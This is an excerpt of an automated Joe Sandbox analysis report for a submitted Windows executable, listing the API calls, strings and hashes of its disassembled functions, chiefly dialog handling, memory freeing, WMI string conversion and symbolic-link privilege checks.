                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                    • Instruction ID: fc53a706aec3cbfa77b91df5fac695a2f440ac746732dc8e2b26d7a61e833ddb
                                                                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                    • Instruction Fuzzy Hash: 3331C4B1B147468FCB54DF28C8511ABBBE0FB95305F50492DE895C7342CB35EA0ACB91
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 0004E30E
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                      • Part of subcall function 00051DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00081030,00000200,0004D928,00000000,?,00000050,00081030), ref: 00051DC4
                                                                                                                    • _strlen.LIBCMT ref: 0004E32F
                                                                                                                    • SetDlgItemTextW.USER32(?,0007E274,?), ref: 0004E38F
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0004E3C9
                                                                                                                    • GetClientRect.USER32(?,?), ref: 0004E3D5
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0004E475
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0004E4A2
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0004E4DB
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0004E4E3
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0004E4EE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0004E51B
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0004E58D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                    • String ID: $%s:$CAPTION$d
                                                                                                                    • API String ID: 2407758923-2512411981
                                                                                                                    • Opcode ID: 6c9fde22a59f8fbe252e5836bc4bde07d62ac61b82c4925afc4b82b2e8511b0e
                                                                                                                    • Instruction ID: ede5e8236668dda5da9f3eac666f5ebf087320ec96943ccd84864ce0d94a494e
                                                                                                                    • Opcode Fuzzy Hash: 6c9fde22a59f8fbe252e5836bc4bde07d62ac61b82c4925afc4b82b2e8511b0e
                                                                                                                    • Instruction Fuzzy Hash: 1781A1B1608341AFD710DF68CC89A6FBBE9FBC9704F04092DFA84E7251D675E9058B52
                                                                                                                    APIs
                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0006CB66
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C71E
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C730
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C742
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C754
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C766
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C778
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C78A
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C79C
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C7AE
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C7C0
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C7D2
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C7E4
                                                                                                                      • Part of subcall function 0006C701: _free.LIBCMT ref: 0006C7F6
                                                                                                                    • _free.LIBCMT ref: 0006CB5B
                                                                                                                      • Part of subcall function 00068DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?), ref: 00068DE2
                                                                                                                      • Part of subcall function 00068DCC: GetLastError.KERNEL32(?,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?,?), ref: 00068DF4
                                                                                                                    • _free.LIBCMT ref: 0006CB7D
                                                                                                                    • _free.LIBCMT ref: 0006CB92
                                                                                                                    • _free.LIBCMT ref: 0006CB9D
                                                                                                                    • _free.LIBCMT ref: 0006CBBF
                                                                                                                    • _free.LIBCMT ref: 0006CBD2
                                                                                                                    • _free.LIBCMT ref: 0006CBE0
                                                                                                                    • _free.LIBCMT ref: 0006CBEB
                                                                                                                    • _free.LIBCMT ref: 0006CC23
                                                                                                                    • _free.LIBCMT ref: 0006CC2A
                                                                                                                    • _free.LIBCMT ref: 0006CC47
                                                                                                                    • _free.LIBCMT ref: 0006CC5F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 161543041-0
                                                                                                                    • Opcode ID: 381bb971c269efd0721831a6454e3063540810f7cb0929309a6fb18cc67abf61
                                                                                                                    • Instruction ID: 5b30c2e1c5c1b103b47ca188401025465ea1a821de26c821252205e01b96ebec
                                                                                                                    • Opcode Fuzzy Hash: 381bb971c269efd0721831a6454e3063540810f7cb0929309a6fb18cc67abf61
                                                                                                                    • Instruction Fuzzy Hash: 87315D316003059FFB61AA79D846FAAB7EBEF10324F149529E598D7192DF35EC80CB20
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00059736
                                                                                                                    • _wcslen.LIBCMT ref: 000597D6
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 000597E5
                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00059806
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0005982D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                    • API String ID: 1777411235-4209811716
                                                                                                                    • Opcode ID: ce6647cf55196693cdcebf5f48d0f20b0358cf3b9652085cc3c93e2c3b76edb2
                                                                                                                    • Instruction ID: cf4417fde2a5633ed8215efb8f695952e28642d4bcc19aa87ac8b9545446be51
                                                                                                                    • Opcode Fuzzy Hash: ce6647cf55196693cdcebf5f48d0f20b0358cf3b9652085cc3c93e2c3b76edb2
                                                                                                                    • Instruction Fuzzy Hash: 8E312532508701BAE725AB249C46FAB779CEF42312F14011EF905961D3EB689A0983BA
                                                                                                                    APIs
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0005D6C1
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0005D6ED
                                                                                                                      • Part of subcall function 00051FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0004C116,00000000,.exe,?,?,00000800,?,?,?,00058E3C), ref: 00051FD1
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0005D709
                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0005D720
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0005D734
                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0005D75D
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0005D764
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0005D76D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                    • String ID: STATIC
                                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                                    • Opcode ID: 30ebfb34642fdf3b5bf52827a0ae257548375a4f24238541320e506995132573
                                                                                                                    • Instruction ID: 38482930444957b1b23bac9a02be0a1c0312e546db5b160b70bc9ead7e45d7ce
                                                                                                                    • Opcode Fuzzy Hash: 30ebfb34642fdf3b5bf52827a0ae257548375a4f24238541320e506995132573
                                                                                                                    • Instruction Fuzzy Hash: 7911E772644B147BF2316B709C4EFEF769CAB46712F004122FE41A5092EB68CB0D46A5
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00069705
                                                                                                                      • Part of subcall function 00068DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?), ref: 00068DE2
                                                                                                                      • Part of subcall function 00068DCC: GetLastError.KERNEL32(?,?,0006C896,?,00000000,?,00000000,?,0006C8BD,?,00000007,?,?,0006CCBA,?,?), ref: 00068DF4
                                                                                                                    • _free.LIBCMT ref: 00069711
                                                                                                                    • _free.LIBCMT ref: 0006971C
                                                                                                                    • _free.LIBCMT ref: 00069727
                                                                                                                    • _free.LIBCMT ref: 00069732
                                                                                                                    • _free.LIBCMT ref: 0006973D
                                                                                                                    • _free.LIBCMT ref: 00069748
                                                                                                                    • _free.LIBCMT ref: 00069753
                                                                                                                    • _free.LIBCMT ref: 0006975E
                                                                                                                    • _free.LIBCMT ref: 0006976C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 47f21106d05e2f94ddf8b6f4bc8428cd31d545889937dcffd2e27a3c93d492b4
                                                                                                                    • Instruction ID: 4f3946c685e180e24b35f0b1f70fba89b523050948c3f05f03697b09fb2f6e19
                                                                                                                    • Opcode Fuzzy Hash: 47f21106d05e2f94ddf8b6f4bc8428cd31d545889937dcffd2e27a3c93d492b4
                                                                                                                    • Instruction Fuzzy Hash: A211A276510109AFCB01EF94C882CD93BBAEF14350B5196A1FA088F262DE32EA50DB94
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                    • String ID: csm$csm$csm
                                                                                                                    • API String ID: 322700389-393685449
                                                                                                                    • Opcode ID: a58babe95b14e44c19ba6f0a6febf3bc37f720790ef9e918de5c3af8614ef5e5
                                                                                                                    • Instruction ID: 18743ac827a20b45d777e533424df1a44b2f5d2a3c6e3fb80e8b7faaa327b788
                                                                                                                    • Opcode Fuzzy Hash: a58babe95b14e44c19ba6f0a6febf3bc37f720790ef9e918de5c3af8614ef5e5
                                                                                                                    • Instruction Fuzzy Hash: 10B17571800609EFCF29DFA4C8819AEBBB7FF15310F14416AE8156B252D771EA52CBD2
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00046FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00047013
                                                                                                                    • _wcslen.LIBCMT ref: 00047084
                                                                                                                      • Part of subcall function 00047A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00047AAB
                                                                                                                      • Part of subcall function 00047A9C: GetLastError.KERNEL32 ref: 00047AF1
                                                                                                                      • Part of subcall function 00047A9C: CloseHandle.KERNEL32(?), ref: 00047B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                                    • Opcode ID: 7bf7389a48ef50b3c8e6714370811b67980af00dc44768765bbf69cb077a6d7f
                                                                                                                    • Instruction ID: 2ade2d821080755016a9dd465ff4fe8b0a3718943ad6d3d5f8a1f8418e2759f3
                                                                                                                    • Opcode Fuzzy Hash: 7bf7389a48ef50b3c8e6714370811b67980af00dc44768765bbf69cb077a6d7f
                                                                                                                    • Instruction Fuzzy Hash: 7441D7F1D08344BAEB30AB749C86FEF77AC9F05304F004475FA59A6183D775AA888769
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00041316: GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                      • Part of subcall function 00041316: SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0005B610
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0005B637
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0005B650
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0005B661
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0005B66A
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0005B67E
                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0005B694
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                    • String ID: LICENSEDLG
                                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                                    • Opcode ID: ce73cc71a243395208890981d0bcf832010c8f9f2a973a4dff1dd7765d9b7cc4
                                                                                                                    • Instruction ID: f79c314a79427e6095f7faf9e03a29410a361453c3f774bc20d7175961e1c7d6
                                                                                                                    • Opcode Fuzzy Hash: ce73cc71a243395208890981d0bcf832010c8f9f2a973a4dff1dd7765d9b7cc4
                                                                                                                    • Instruction Fuzzy Hash: 8521A332604605BBF2215F65ED4EF7B3BADFB46B42F014015FA04E60A1CBAEAA059635
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,455F76DE,00000001,00000000,00000000,?,?,0004AF6C,ROOT\CIMV2), ref: 0005FD99
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0004AF6C,ROOT\CIMV2), ref: 0005FE14
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0005FE1F
                                                                                                                    • _com_issue_error.COMSUPP ref: 0005FE48
                                                                                                                    • _com_issue_error.COMSUPP ref: 0005FE52
                                                                                                                    • GetLastError.KERNEL32(80070057,455F76DE,00000001,00000000,00000000,?,?,0004AF6C,ROOT\CIMV2), ref: 0005FE57
                                                                                                                    • _com_issue_error.COMSUPP ref: 0005FE6A
                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,0004AF6C,ROOT\CIMV2), ref: 0005FE80
                                                                                                                    • _com_issue_error.COMSUPP ref: 0005FE93
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1353541977-0
                                                                                                                    • Opcode ID: 6a48c26050227d4f158f56bd8c8ea4560491fecaf1794b70ad17acdf7e37f9d4
